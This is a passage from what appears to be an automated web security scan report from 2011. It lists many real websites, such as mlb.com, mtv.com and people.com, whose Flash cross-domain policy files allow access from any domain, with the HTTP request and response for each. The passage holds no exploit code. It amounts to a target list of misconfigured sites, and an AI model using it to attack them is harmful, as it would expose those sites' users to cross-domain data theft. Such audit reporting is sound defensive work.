   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

7.85. http://www.mate1.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:37 GMT
Server: Apache
Set-Cookie: DATESESS=fbd31cc9c09d8951; domain=.mate1.com; path=/
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=0, private
Expires: Sat, 02 Apr 2011 13:56:37 GMT
Content-Length: 267
Content-Type: application/xml
X-Cache: MISS from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" to-ports="*" />
...[SNIP]...

7.86. http://www.menshealth.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Jan 2008 12:17:58 GMT
ETag: "c9-62610980"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.87. http://www.metacafe.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "17f18a6-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:23:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.88. http://www.metrolyrics.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "c4-4c72c0fe-0"
Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT
Content-Type: application/xml
Content-Length: 196
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.89. http://www.minorleaguebaseball.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minorleaguebaseball.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.minorleaguebaseball.com

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:37:49 GMT
Content-Type: text/xml
Content-Length: 80
Cache-Control: max-age=60
Edge-control: max-age=60
Last-Modified: Mon, 16 May 2005 18:12:09 GMT
ETag: "50-4288e279"
Accept-Ranges: bytes
Age: 47
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.90. http://www.mlb.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-Length: 428
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=60
Edge-control: max-age=60
ETag: "1ac-4d35f489"
Age: 25
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...

7.91. http://www.mmo-champion.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmo-champion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmo-champion.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Nov 2010 22:26:07 GMT
Content-Length: 332
Date: Sat, 02 Apr 2011 13:46:14 GMT
Connection: close
X-Cache-Hits: -1
X-URL: /crossdomain.xml
X-Backend: phpservers2
X-Req: 455438597
X-Language: en

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.92. http://www.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

7.93. http://www.myrecipes.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myrecipes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 18:26:00 GMT
ETag: "b13f7-d9-491e2caecde00"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cros
...[SNIP]...

7.94. http://www.ncm.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 897

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="tst.ncmsocial.com"/>
<allow-access-from domain="localhost.ncmsocial.com"/>
<allow-access-from domain="dev.ncmsocial.com"/>
<allow-access-from domain="ncmsocial.com"/>
<allow-access-from domain="www.ncmsocial.com"/>
<allow-access-from domain="www.totaleclips.com"/>
<allow-access-from domain="totaleclips.com"/>
<allow-access-from domain="edgesuite.net"/>
<allow-access-from domain="progressive.totaleclips.com.edgesuite.net"/>
<allow-access-from domain="www.fathomevents.com"/>
<allow-access-from domain="www.movienightout.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.95. http://www.newser.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newser.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Sun, 01 Feb 2009 20:47:39 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 324

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.96. http://www.newsok.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd06e-106-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/xml
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 556
Content-Length: 262

<?xml version="1.0"?>
<!-- http://static.newsok.biz/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="newsok..com" />
<allow-access-from domain="*.newsok..com" />
<allow-access-from domain="*" />
...[SNIP]...

7.97. http://www.nickjr.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 864
Content-Type: text/xml
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"864-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.nickjr.com" />
   <allow-access-from domain="*.nickjr-d.mtvi.com" />
   <allow-access-from domain="*.nickjr-q.mtvi.com" />
   <allow-access-from domain="*.nick.com" />
   <allow-access-from domain="*.nick-d.mtvi.com" />
   <allow-access-from domain="*.nick-q.mtvi.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.dimetapp.com" />
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.tween.as" />
...[SNIP]...

7.98. http://www.nola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 324
Content-Type: text/xml
ETag: "71686e-144-47185a180bb40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 324
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
Date: Sat, 02 Apr 2011 13:37:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.99. http://www.nydailynews.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Fri, 14 Sep 2007 15:01:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Keep-Alive: timeout=3, max=999
Content-Type: application/xml
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:19 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.100. http://www.oodle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "11c80ff-ca-44832e564dd40"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.101. http://www.openforum.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openforum.com

Response

HTTP/1.0 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Tue, 22 Mar 2011 14:34:04 GMT
Accept-Ranges: bytes
ETag: "1CBE89E31501600"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: public, max-age=65014
Expires: Sun, 03 Apr 2011 07:43:08 GMT
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.102. http://www.opportunity.co/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 03:06:57 GMT
ETag: "48c0006-c3-f11a7640"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.103. http://www.outdoorchannel.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorchannel.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Last-Modified: Fri, 27 Aug 2010 15:20:56 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:28 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=8b192145-0a99-4adb-8be8-ad64d5a6e8cd; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Content-Length: 208
Connection: close
Via: 1.1 AN-0016020121270012

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.104. http://www.pcworld.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"194-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: application/xml
Content-Length: 194
Date: Sat, 02 Apr 2011 14:10:44 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

7.105. http://www.people.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.106. http://www.peoplestylewatch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...

7.107. http://www.pittsburghlive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pittsburghlive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pittsburghlive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:01 GMT
Server: Apache/2.2.3 (Red Hat) PHP/5.1.6
Last-Modified: Mon, 24 Jan 2011 21:35:59 GMT
Accept-Ranges: bytes
Content-Length: 455
Vary: Accept-Encoding,User-agent
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
       <site-control permitted-cross-domain-poli
...[SNIP]...
<allow-access-from domain="*" />
       <allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abacast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pittsburghlive.com"/>
...[SNIP]...

7.108. http://www.playfin.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playfin.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playfin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 23:46:03 GMT
ETag: "1cf1115-c6-49c83001704c0"
Accept-Ranges: bytes
Content-Length: 198
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.109. http://www.pokerstars.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pokerstars.com
Path:   /crossdomain.xml

Issue detail

